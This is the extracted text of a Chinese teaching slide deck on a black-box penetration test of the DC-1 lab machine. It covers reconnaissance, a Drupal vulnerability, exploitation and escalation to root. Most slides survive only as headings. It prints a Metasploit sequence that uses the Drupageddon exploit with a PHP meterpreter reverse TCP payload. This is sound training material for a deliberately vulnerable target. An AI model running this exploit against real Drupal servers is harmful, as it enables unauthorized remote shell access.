第8章81DC1靶机渗透测试实践.pptxVIP

DC-1靶机渗透测试实践;第8章为渗透测试综合实践，对综合的靶场环境进行黑盒渗透，获取服务器系统权限，需要结合前面课程所学习的内容包括信息收集、漏洞查找、漏洞利用、权限提升等，对综合渗透环境进行渗透测试实践，旨在帮助学者把前面所学习的知识进行融会贯通，学以致用。;DC-1是一个专门构建的易受攻击的靶机，目标旨在通过渗透测试获取目标信息，拿到root权限。

要成功完成这一挑战，需要Linux技能、熟悉Linux命令行以及使用基本渗透测试工具的经验。

DC-1靶机的下载地址为：/dc/DC-1.zip

;渗透目标信息收集;信息收集;信息收集

;信息收集

;Drupal简介;渗透目标信息收集;漏洞探测;在Metasploit中输入SearchDrupal，查找漏洞利用模块。

在Matesploit中搜索到可利用模块后，对漏洞进行利用。

例如，选择模块drupal_drupageddon;渗透目标信息收集;模块drupal_drupageddon具体命令如下：

useexploit/multi/http/drupal_drupageddon

setpayloadphp/meterpreter/reverse_tcp

setrhosts46

exploit

;漏洞利用

;漏洞利用

;漏洞利用;漏洞利用

;漏洞利用

;漏洞利用

;漏洞利用

;漏洞利用;漏洞利用

;漏洞利用

;渗透目标信息收集;权限提升;权限提升;总结